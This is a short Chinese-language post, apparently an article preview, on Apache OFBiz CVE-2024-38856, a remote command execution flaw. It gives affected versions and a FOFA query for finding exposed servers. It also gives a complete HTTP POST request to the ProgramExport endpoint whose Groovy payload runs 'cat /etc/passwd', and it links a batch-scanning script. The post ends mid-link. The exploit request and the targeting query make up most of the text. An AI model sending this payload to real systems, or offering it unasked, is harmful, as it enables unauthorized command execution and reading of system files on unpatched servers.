CVE-2024-38856 POC

文章预览

Apache OFBiz CVE-2024-38856 远程命令执行漏洞 漏洞描述 Apache OFBiz是一个非常著名的电子商务平台，是一个非常著名的开源项目，提供了创建基于最新J2EE/XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。Apache OFBiz在处理view视图渲染的时候存在逻辑缺陷，攻击者可通过构造特殊URL来覆盖最终的渲染视图，从而执行任意代码。 影响版本 Apache OFBiz < = 18.12.14 fofa语法 app="Apache_OFBiz" 漏洞POC POST /webtools/control/main/ProgramExport HTTP/1.1 Host: x.x.x.x User-Agent:Mozilla/5.0(Windows NT 6.1)AppleWebKit/537.36(KHTML, like Gecko)Chrome/41.0.2228.0Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length:68 groovyProgram=thrownewException('cat /etc/passwd'.execute().text); 批量检测脚本 https://github.com/ATonysan/poc-exp/blob/main/Apach ………………………………